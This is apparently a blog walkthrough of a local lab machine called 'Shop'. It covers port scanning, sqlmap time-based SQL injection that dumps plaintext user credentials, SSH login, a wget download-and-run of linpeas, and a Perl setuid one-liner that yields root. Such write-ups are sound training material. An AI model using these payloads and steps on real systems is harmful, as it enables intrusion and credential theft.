SHOP MACHINE

 SHOP

 

The first step was network reconnaissance to identify the target machine, arp-scan was used to find active hosts on the local network, confirming the existence of the host at 192.168.88.5.
┌──(luis㉿kali)-[~]
└─$ sudo arp-scan -I eth0 --localnet   
[sudo] contraseña para luis:
Interface: eth0, type: EN10MB, MAC: 08:00:27:4d:8a:0f, IPv4: 192.168.88.6
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.88.1    d8:44:89:50:2d:a3    (Unknown)
192.168.88.4    00:e0:4c:97:01:a7    (Unknown)
192.168.88.5    08:00:27:8c:fc:84    (Unknown)

3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.900 seconds (88.28 hosts/sec). 3 responded

Now, we have to execute this command and we should see if there is connectivity between both machines as you can see below.
┌──(luis㉿kali)-[~]
└─$ ping -c3 192.168.88.5
PING 192.168.88.5 (192.168.88.5) 56(84) bytes of data.
64 bytes from 192.168.88.5: icmp_seq=1 ttl=64 time=0.763 ms
64 bytes from 192.168.88.5: icmp_seq=2 ttl=64 time=0.436 ms
64 bytes from 192.168.88.5: icmp_seq=3 ttl=64 time=0.540 ms

--- 192.168.88.5 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2039ms
rtt min/avg/max/mdev = 0.436/0.579/0.763/0.136 ms

Once the host was identified, Nmap, a port scanning tool, was used to discover which services were running on the machine. The scan revealed that ports 22 (SSH) and 80 (HTTP) were open. 

In addition, Nmap results showed that port 80 was running an Apache httpd 2.4.38 web server and port 22 was running an OpenSSH 7.9p1 server.
┌──(luis㉿kali)-[~]
└─$ sudo nmap -n -Pn  -p- --min-rate 5000 192.168.88.5 -vvv -sV -vvv
[sudo] contraseña para luis:
Lo siento, pruebe otra vez.
[sudo] contraseña para luis:
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-12 19:44 CEST
NSE: Loaded 47 scripts for scanning.
Initiating ARP Ping Scan at 19:44
Scanning 192.168.88.5 [1 port]
Completed ARP Ping Scan at 19:44, 0.13s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 19:44
Scanning 192.168.88.5 [65535 ports]
Discovered open port 22/tcp on 192.168.88.5
Discovered open port 80/tcp on 192.168.88.5
SYN Stealth Scan Timing: About 60.28% done; ETC: 19:46 (0:00:45 remaining)
Increasing send delay for 192.168.88.5 from 0 to 5 due to 5774 out of 19245 dropped probes since last increase.
SYN Stealth Scan Timing: About 79.87% done; ETC: 19:47 (0:00:33 remaining)
Increasing send delay for 192.168.88.5 from 5 to 10 due to 201 out of 668 dropped probes since last increase.
Increasing send delay for 192.168.88.5 from 10 to 20 due to 2591 out of 8636 dropped probes since last increase.
Increasing send delay for 192.168.88.5 from 20 to 40 due to max_successful_tryno increase to 4
Increasing send delay for 192.168.88.5 from 40 to 80 due to max_successful_tryno increase to 5
Increasing send delay for 192.168.88.5 from 80 to 160 due to max_successful_tryno increase to 6
Increasing send delay for 192.168.88.5 from 160 to 320 due to max_successful_tryno increase to 7
Increasing send delay for 192.168.88.5 from 320 to 640 due to max_successful_tryno increase to 8
Increasing send delay for 192.168.88.5 from 640 to 1000 due to max_successful_tryno increase to 9
Completed SYN Stealth Scan at 19:51, 441.14s elapsed (65535 total ports)
Initiating Service scan at 19:52
Scanning 2 services on 192.168.88.5
Completed Service scan at 19:52, 7.11s elapsed (2 services on 1 host)
NSE: Script scanning 192.168.88.5.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 19:52
Completed NSE at 19:52, 0.72s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 19:52
Completed NSE at 19:52, 0.25s elapsed
Nmap scan report for 192.168.88.5
Host is up, received arp-response (0.00061s latency).
Scanned at 2025-09-12 19:44:38 CEST for 450s
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 64 OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp open  http    syn-ack ttl 64 Apache httpd 2.4.38 ((Debian))
MAC Address: 08:00:27:8C:FC:84 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 454.29 seconds
           Raw packets sent: 309472 (13.617MB) | Rcvd: 65578 (2.628MB)

With the web service identified on port 80, the next step was to search for hidden directories and files. The Gobuster tool was used with a common wordlist for this purpose as you can see below, but gobuster discovered an interesting directory named /administrator. This finding suggested the existence of a login panel that could be a target for a vulnerability.
┌──(luis㉿kali)-[~]
└─$ sudo gobuster dir -url "http://192.168.88.5/" -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x php,txt,bak,doc,jpg
===============================================================
Gobuster v3.8
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.88.5/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.8
[+] Extensions:              doc,jpg,php,txt,bak
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/1.jpg                (Status: 200) [Size: 211418]
/2.jpg                (Status: 200) [Size: 200971]
/3.jpg                (Status: 200) [Size: 214425]
/css                  (Status: 301) [Size: 310] [--> http://192.168.88.5/css/]
/js                   (Status: 301) [Size: 309] [--> http://192.168.88.5/js/]
/fonts                (Status: 301) [Size: 312] [--> http://192.168.88.5/fonts/]
/administrator        (Status: 301) [Size: 320] [--> http://192.168.88.5/administrator/]

Now, we have discovered a website in this url which you can see in the picture below and then we have discovered differents forbidden web pages below in the pictures. 







   Gotcha! we have discovered webpage as you can see in the picture below.



Upon accessing the /administrator directory, a login form was found. To test if it was vulnerable to a SQL Injection, the sqlmap tool was used.

In addition, Sqlmap is an automated tool that finds and exploits SQL injection vulnerabilities. The first command searched for available databases. After a series of tests, sqlmap identified a time-based blind vulnerability in the username field and found a database named Webapp.

┌──(root㉿kali)-[/home/luis]
└─# sqlmap --url "http://192.168.88.5/administrator/" --dbs --forms --batch
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.9.8#stable}
|_ -| . [.]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 20:05:39 /2025-09-12/

[20:05:39] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=r0pc18hf9a0...v1gur7abgg'). Do you want to use those [Y/n] Y
[20:05:40] [INFO] searching for forms
[1/1] Form:
POST http://192.168.88.5/administrator/login.php
POST data: username=&password=&submit=
do you want to test this form? [Y/n/q]
> Y
Edit POST data [default: username=&password=&submit=] (Warning: blank fields detected): username=&password=&submit=
do you want to fill blank fields with random values? [Y/n] Y
[20:05:41] [INFO] using '/root/.local/share/sqlmap/output/results-09122025_0805pm.csv' as the CSV results file in multiple targets mode
[20:05:41] [INFO] checking if the target is protected by some kind of WAF/IPS
[20:05:41] [INFO] testing if the target URL content is stable
[20:05:41] [INFO] target URL content is stable
[20:05:41] [INFO] testing if POST parameter 'username' is dynamic
[20:05:41] [WARNING] POST parameter 'username' does not appear to be dynamic
[20:05:41] [WARNING] heuristic (basic) test shows that POST parameter 'username' might not be injectable
[20:05:41] [INFO] testing for SQL injection on POST parameter 'username'
[20:05:42] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:05:42] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[20:05:42] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[20:05:42] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[20:05:42] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[20:05:42] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[20:05:42] [INFO] testing 'Generic inline queries'
[20:05:42] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[20:05:42] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[20:05:42] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[20:05:42] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[20:05:53] [INFO] POST parameter 'username' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[20:05:53] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[20:05:53] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
got a 302 redirect to 'http://192.168.88.5/administrator/profile.php'. Do you want to follow? [Y/n] Y
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [y/N] N
[20:05:55] [INFO] target URL appears to be UNION injectable with 2 columns
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] Y
[20:06:02] [WARNING] if UNION based SQL injection is not detected, please consider forcing the back-end DBMS (e.g. '--dbms=mysql')
[20:06:03] [INFO] checking if the injection point on POST parameter 'username' is a false positive
POST parameter 'username' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 88 HTTP(s) requests:
---
Parameter: username (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: username=pBXu' AND (SELECT 7720 FROM (SELECT(SLEEP(5)))aDPR) AND 'ArvY'='ArvY&password=ukBS&submit=LSxO
---
do you want to exploit this SQL injection? [Y/n] Y
[20:06:19] [INFO] the back-end DBMS is MySQL
[20:06:19] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
web server operating system: Linux Debian 10 (buster)
web application technology: Apache 2.4.38
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[20:06:24] [INFO] fetching database names
[20:06:24] [INFO] fetching number of databases
[20:06:24] [INFO] retrieved: 4
[20:06:30] [INFO] retrieved:
[20:06:35] [INFO] adjusting time delay to 2 seconds due to good response times
information_schema
[20:08:45] [INFO] retrieved: Webapp
[20:09:42] [INFO] retrieved: mysql
[20:10:24] [INFO] retrieved: performance_schema
available databases [4]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] Webapp

[20:12:38] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/root/.local/share/sqlmap/output/results-09122025_0805pm.csv'

[*] ending @ 20:12:38 /2025-09-12/

The process continued by enumerating the tables within the Webapp database as you can see below.
┌──(root㉿kali)-[/home/luis]
└─# sqlmap --url "http://192.168.88.5/administrator/" -D Webapp --tables  --forms --batch
        ___
       __H__
 ___ ___[']_____ ___ ___  {1.9.8#stable}
|_ -| . [.]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 20:44:28 /2025-09-12/

[20:44:29] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=cqrlc4sb6d3...rth96gj6cd'). Do you want to use those [Y/n] Y
[20:44:31] [INFO] searching for forms
[1/1] Form:
POST http://192.168.88.5/administrator/login.php
POST data: username=&password=&submit=
do you want to test this form? [Y/n/q]
> Y
Edit POST data [default: username=&password=&submit=] (Warning: blank fields detected): username=&password=&submit=
do you want to fill blank fields with random values? [Y/n] Y
[20:44:35] [INFO] resuming back-end DBMS 'mysql'
[20:44:35] [INFO] using '/root/.local/share/sqlmap/output/results-09122025_0844pm.csv' as the CSV results file in multiple targets mode
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: username (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: username=pBXu' AND (SELECT 7720 FROM (SELECT(SLEEP(5)))aDPR) AND 'ArvY'='ArvY&password=ukBS&submit=LSxO
---
do you want to exploit this SQL injection? [Y/n] Y
[20:44:36] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 10 (buster)
web application technology: Apache 2.4.38
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[20:44:36] [INFO] fetching tables for database: 'Webapp'
[20:44:36] [INFO] fetching number of tables for database 'Webapp'
[20:44:37] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)                                                              
[20:44:43] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
1
[20:44:50] [INFO] retrieved:
[20:45:01] [INFO] adjusting time delay to 2 seconds due to good response times
Users
Database: Webapp
[1 table]
+-------+
| Users |
+-------+

[20:45:33] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/root/.local/share/sqlmap/output/results-09122025_0844pm.csv'

[*] ending @ 20:45:33 /2025-09-12/

Sqlmap revealed a table called Users. Next, the columns of the Users table were extracted easily as you can see below.                                                                                                                    

Also, the columns found were id, username, and password. Finally, the full data from the table was dumped to obtain the users' credentials.                                            
┌──(root㉿kali)-[/home/luis]
└─# sqlmap --url "http://192.168.88.5/administrator/" -D Webapp -T Users --columns   --forms --batch
        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.9.8#stable}
|_ -| . [(]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 20:47:55 /2025-09-12/

[20:47:56] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=on7p5aap9n3...ht81qcqibv'). Do you want to use those [Y/n] Y
[20:47:59] [INFO] searching for forms
[1/1] Form:
POST http://192.168.88.5/administrator/login.php
POST data: username=&password=&submit=
do you want to test this form? [Y/n/q]
> Y
Edit POST data [default: username=&password=&submit=] (Warning: blank fields detected): username=&password=&submit=
do you want to fill blank fields with random values? [Y/n] Y
[20:48:04] [INFO] resuming back-end DBMS 'mysql'
[20:48:04] [INFO] using '/root/.local/share/sqlmap/output/results-09122025_0848pm.csv' as the CSV results file in multiple targets mode
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: username (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: username=pBXu' AND (SELECT 7720 FROM (SELECT(SLEEP(5)))aDPR) AND 'ArvY'='ArvY&password=ukBS&submit=LSxO
---
do you want to exploit this SQL injection? [Y/n] Y
[20:48:05] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 10 (buster)
web application technology: Apache 2.4.38
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[20:48:05] [INFO] fetching columns for table 'Users' in database 'Webapp'
[20:48:06] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)                                                              
[20:48:18] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
[20:48:36] [INFO] adjusting time delay to 3 seconds due to good response times
3
[20:48:38] [INFO] retrieved: id
[20:48:59] [INFO] retrieved: int(6)
[20:50:24] [INFO] retrieved: username
[20:51:41] [INFO] retrieved: varchar(32)
[20:53:32] [INFO] retrieved: password
[20:55:00] [INFO] retrieved: varchar(32)
Database: Webapp
Table: Users
[3 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| id       | int(6)      |
| password | varchar(32) |
| username | varchar(32) |
+----------+-------------+

[20:56:53] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/root/.local/share/sqlmap/output/results-09122025_0848pm.csv'

[*] ending @ 20:56:53 /2025-09-12/

The data dump showed the following credentials:

  • peter: peter123!

  • mike: mikeblabla

  • bart: b4rtp0w4

  • liam: liam@nd3rs0n

┌──(root㉿kali)-[/home/luis]
└─# sqlmap --url "http://192.168.88.5/administrator/" -D Webapp -T Users  --dump  --forms --batch
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.9.8#stable}
|_ -| . ["]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 21:13:41 /2025-09-12/

[21:13:42] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=hj6s84tlunk...beb0jr8094'). Do you want to use those [Y/n] Y
[21:13:44] [INFO] searching for forms
[1/1] Form:
POST http://192.168.88.5/administrator/login.php
POST data: username=&password=&submit=
do you want to test this form? [Y/n/q]
> Y
Edit POST data [default: username=&password=&submit=] (Warning: blank fields detected): username=&password=&submit=
do you want to fill blank fields with random values? [Y/n] Y
[21:13:48] [INFO] resuming back-end DBMS 'mysql'
[21:13:48] [INFO] using '/root/.local/share/sqlmap/output/results-09122025_0913pm.csv' as the CSV results file in multiple targets mode
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: username (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: username=pBXu' AND (SELECT 7720 FROM (SELECT(SLEEP(5)))aDPR) AND 'ArvY'='ArvY&password=ukBS&submit=LSxO
---
do you want to exploit this SQL injection? [Y/n] Y
[21:13:49] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 10 (buster)
web application technology: Apache 2.4.38
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[21:13:49] [INFO] fetching columns for table 'Users' in database 'Webapp'
[21:13:49] [INFO] resumed: 3
[21:13:49] [INFO] resumed: id
[21:13:49] [INFO] resumed: username
[21:13:49] [INFO] resumed: password
[21:13:49] [INFO] fetching entries for table 'Users' in database 'Webapp'
[21:13:49] [INFO] fetching number of entries for table 'Users' in database 'Webapp'
[21:13:49] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)                                                              
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
[21:13:59] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
4
[21:14:00] [WARNING] (case) time-based comparison requires reset of statistical model, please wait.............................. (done)                                                     
1
[21:14:14] [INFO] retrieved:
[21:14:20] [INFO] adjusting time delay to 1 second due to good response times
peter123!
[21:14:53] [INFO] retrieved: peter
[21:15:13] [INFO] retrieved: 2
[21:15:17] [INFO] retrieved: mikeblabla
[21:15:49] [INFO] retrieved: mike
[21:16:04] [INFO] retrieved: 3
[21:16:08] [INFO] retrieved: b4rtp0w4
[21:16:48] [INFO] retrieved: bart
[21:17:02] [INFO] retrieved: 4
[21:17:08] [INFO] retrieved: liam@nd3rs0n
[21:18:01] [INFO] retrieved: liam
Database: Webapp
Table: Users
[4 entries]
+----+--------------+----------+
| id | password     | username |
+----+--------------+----------+
| 1  | peter123!    | peter    |
| 2  | mikeblabla   | mike     |
| 3  | b4rtp0w4     | bart     |
| 4  | liam@nd3rs0n | liam     |
+----+--------------+----------+

[21:18:15] [INFO] table 'Webapp.Users' dumped to CSV file '/root/.local/share/sqlmap/output/192.168.88.5/dump/Webapp/Users.csv'
[21:18:15] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/root/.local/share/sqlmap/output/results-09122025_0913pm.csv'

With the obtained credentials, an attempt was made to access the machine via the SSH service discovered earlier on port 22. The credentials for bart were successful, but we had to tried with all users and we obtained bart credentials:
  • bart: b4rtp0w4
Access was gained as the user bart. The first action was to look for the user.txt file to get the first "flag."
┌──(luis㉿kali)-[~]
└─$ ssh bart@192.168.88.5
The authenticity of host '192.168.88.5 (192.168.88.5)' can't be established.
ED25519 key fingerprint is SHA256:6B7Eq7tDKYRhgb51UUxBClZm4njvA+jpdW3lVy6PPK4.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.88.5' (ED25519) to the list of known hosts.
bart@192.168.88.5's password:
bart@shop:~$ whoami
bart
bart@shop:~$ sudo -l
-bash: sudo: orden no encontrada
bart@shop:~$ script /dev/null -c bash
Script iniciado; el fichero es /dev/null
bart@shop:~$ ls
user.txt
Gotcha! we have discovered the user flag
bart@shop:~$ cat user.txt
598a05f84190e327bc4796335d948144
bart@shop:~$ find /-perm -4000 2>/dev/null
bart@shop:~$ getcap 2>/dev/null
bart@shop:~$ getcap -r  2>/dev/null
bart@shop:~$ /sbin/getcap -r  2>/dev/null
bart@shop:~$ /sbin/getcap -r  / 2>/dev/null
/usr/bin/perl5.28.1 = cap_setuid+ep
/usr/bin/perl = cap_setuid+ep

The ultimate goal was to gain root access. An attempt to use sudo -l failed. The next step was to enumerate possible privilege escalation vectors on the system.
The getcap tool was used to search for files with special permissions (capabilities). The result showed that the Perl executables had the  cap_setuid+ep permission in the link you can see below:



Now, we have to download and exectute this toolkit as you can see below.
bart@shop:/tmp$ wget https://github.com/peass-ng/PEASS-ng/releases/download/20250904-27f4363e/linpeas.sh
--2025-09-12 22:36:59--  https://github.com/peass-ng/PEASS-ng/releases/download/20250904-27f4363e/linpeas.sh
Resolviendo github.com (github.com)... 140.82.121.3
Conectando con github.com (github.com)[140.82.121.3]:443... conectado.
Petición HTTP enviada, esperando respuesta... 302 Found
Localización: https://release-assets.githubusercontent.com/github-production-release-asset/165548191/8d829b89-f4bc-402c-ab2d-b18bb9f64212?sp=r&sv=2018-11-09&sr=b&spr=https&se=2025-09-12T21%3A13%3A03Z&rscd=attachment%3B+filename%3Dlinpeas.sh&rsct=application%2Foctet-stream&skoid=96c2d410-5711-43a1-aedd-ab1947aa7ab0&sktid=398a6654-997b-47e9-b12b-9515b896b4de&skt=2025-09-12T20%3A12%3A38Z&ske=2025-09-12T21%3A13%3A03Z&sks=b&skv=2018-11-09&sig=3VbypFXZoFOMHP%2B36xd56VW5xXEF0llqlshw%2FKk%2FE%2FE%3D&jwt=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmVsZWFzZS1hc3NldHMuZ2l0aHVidXNlcmNvbnRlbnQuY29tIiwia2V5Ijoia2V5MSIsImV4cCI6MTc1NzcwOTcyMCwibmJmIjoxNzU3NzA5NDIwLCJwYXRoIjoicmVsZWFzZWFzc2V0cHJvZHVjdGlvbi5ibG9iLmNvcmUud2luZG93cy5uZXQifQ.Cii9HerAJKTpIVvMy1kNpmzn1QPyt-fTVtKwrVOZ7O0&response-content-disposition=attachment%3B%20filename%3Dlinpeas.sh&response-content-type=application%2Foctet-stream [siguiendo]
--2025-09-12 22:37:00--  https://release-assets.githubusercontent.com/github-production-release-asset/165548191/8d829b89-f4bc-402c-ab2d-b18bb9f64212?sp=r&sv=2018-11-09&sr=b&spr=https&se=2025-09-12T21%3A13%3A03Z&rscd=attachment%3B+filename%3Dlinpeas.sh&rsct=application%2Foctet-stream&skoid=96c2d410-5711-43a1-aedd-ab1947aa7ab0&sktid=398a6654-997b-47e9-b12b-9515b896b4de&skt=2025-09-12T20%3A12%3A38Z&ske=2025-09-12T21%3A13%3A03Z&sks=b&skv=2018-11-09&sig=3VbypFXZoFOMHP%2B36xd56VW5xXEF0llqlshw%2FKk%2FE%2FE%3D&jwt=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmVsZWFzZS1hc3NldHMuZ2l0aHVidXNlcmNvbnRlbnQuY29tIiwia2V5Ijoia2V5MSIsImV4cCI6MTc1NzcwOTcyMCwibmJmIjoxNzU3NzA5NDIwLCJwYXRoIjoicmVsZWFzZWFzc2V0cHJvZHVjdGlvbi5ibG9iLmNvcmUud2luZG93cy5uZXQifQ.Cii9HerAJKTpIVvMy1kNpmzn1QPyt-fTVtKwrVOZ7O0&response-content-disposition=attachment%3B%20filename%3Dlinpeas.sh&response-content-type=application%2Foctet-stream
Resolviendo release-assets.githubusercontent.com (release-assets.githubusercontent.com)... 185.199.111.133, 185.199.109.133, 185.199.110.133, ...
Conectando con release-assets.githubusercontent.com (release-assets.githubusercontent.com)[185.199.111.133]:443... conectado.
Petición HTTP enviada, esperando respuesta... 200 OK
Longitud: 961834 (939K) [application/octet-stream]
Grabando a: “linpeas.sh”

linpeas.sh                            100%[========================================================================>] 939,29K  3,59MB/s    en 0,3s    

2025-09-12 22:37:01 (3,59 MB/s) - “linpeas.sh” guardado [961834/961834]

bart@shop:/tmp$ ls
linpeas.sh
systemd-private-d0cce5d2e13e40e382de5071127af918-apache2.service-GqxqMF
systemd-private-d0cce5d2e13e40e382de5071127af918-systemd-timesyncd.service-wraE3B
bart@shop:/tmp$ chmod +x linpeas.sh
bart@shop:/tmp$ ./linpeas.sh

Files with capabilities (limited to 50):
/usr/bin/perl5.28.1 = cap_setuid+ep
/usr/bin/perl = cap_setuid+ep


The cap_setuid permission allows a program to change its User ID (UID) to 0, which effectively grants it root permissions. Once this vulnerability was identified, a known payload for Perl was used to exploit this capability.
bart@shop:/tmp$
bart@shop:/tmp$ /usr/bin/perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/bash";'
root@shop:/tmp# whoami
root
root@shop:/tmp#
root@shop:/tmp# find / -name *root.txt 2>/dev/null
/root/root.txt
root@shop:/tmp# cd /root/
root@shop:/root# ls
root.txt
Gotcha! we have discovered the root flag
root@shop:/root# cat root.txt
1c4cddb6c20e0e756163b2a9714a1260

I hope you liked and learned something new

This article has been done with ethical proposes

Good Hack

Comments

Post a Comment

Entradas Populares

INTERNAL

Image
 INTERNAL(TRYHACKME) First of all, let's go execute nmap command to identify alives ports and version with this host 192.168.88.6 as you can see below. Key open ports and services include: Web Servers: Port 80 (HTTP):  Running  Apache2 Ubuntu Default Page . It supports  OPTIONS ,  TRACE  (flagged as potentially risky),  GET ,  HEAD , and  POST  methods. The webpage title is " INTERNAL ". SSH Protocol Port 22 (SSH): Running Linux . ┌──(root㉿kali)-[/home/luis/Descargas] └─# nmap -n -Pn -p- --min-rate 5000 -sC 10.10.216.78 -vvv Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-07 12:06 CEST NSE: Loaded 126 scripts for scanning. NSE: Script Pre-scanning. NSE: Starting runlevel 1 (of 2) scan. Initiating NSE at 12:06 Completed NSE at 12:06, 0.00s elapsed NSE: Starting runlevel 2 (of 2) scan. Initiating NSE at 12:06 Completed NSE at 12:06, 0.00s elapsed Initiating SYN Stealth Scan at 12:06 Scanning 10.10.216.78 [65535 ports] Discove...
Read more »

TOR WEB BROWSER

Image
  TOR WEB BROWSER TOR INSTALLATION First of all; we're going to this link from the oficial webpage: https://www.torproject.org/es/download/   where we have to download this version our laptop, Windows and Linux but in my case I've had to download for Windows 10. When the program is installed we will press execute and we'll follow step by step:   We'll open and we'll see this image where you have to select the language and select ok to continue the instal l ation. In addition, we'll select the location wherever you want install the program, but in my case I prefer the default location and you'll able to select wherever you want. Now, we will be started the installation process and when it finished you will be able to see the picture below: TOR CONNECT If the process has been successful, you will be able to connect with the connect button which you can observe in both pictures below: ADD A BRIDGE ...
Read more »

activedirectory

Image
ACTIVEDIRECTORY (TRYHACKME) First of all, let’s go to execute nmap toolkit and we'll be able to start the enumeration of the ports as you can see below with this command: sudo nmap -n -Pn -p- --min-rate 5000 10.10.135.154 -vvv -sC -sV This revealed several open TCP ports with associated services, including: DNS (53),  HTTP  (80),  Kerberos (88),  RPC (135),  NetBIOS-SSN (139),  SMB (445),  RDP (3389),  WS-Management (5985)  LDAP (389, 636, 3268, 3269) Moreover, service and NSE script detection provided valuable information about the services running on these ports, such as IIS 10.0, Microsoft Windows Kerberos , Active Directory LDAP , and Microsoft Terminal Services . The SSL/TLS certificate information on port 3389 indicated the common name AttacktiveDirectory.spookysec.local, reinforcing the target as an Active Directory server. rdp-ntlm-info also provided details about the domain (THM-AD) and computer name (ATTACKTIVEDIREC) as you can se...
Read more »

PICKLE RICK

Image
  PICKLE RICK I'm going to realize the resolution of the machine Level Easy from Tryhackme called  Pickle Rick  which is a machine so easy to realize. First of all,  we can observe that in the picture bellow we have some inforamtion and I'm going to execute control +u  and we can see in the second picture below that we've obtained a  Username. I'm going to gathering information about machine and I have to enter in the Linux terminal and I must introduce this command which you canobserve in the picture below:   gobuster dir -u(url) http://10.10.99.188/ -w(password dictionary)  /usr/share/wordlist/dirb/common.txt -x (formato que quereos que busque) .txt*, .php, .login,  In this case, we can observe that scan has discovered this 4 webpages: /assests /denied.php /index.html /login.php /robots.txt Now, we can see such as the web page from /robots.txt   it seems the password in the picture below. Now, we've discovered this login web page...
Read more »

Metasploit Framework

Image
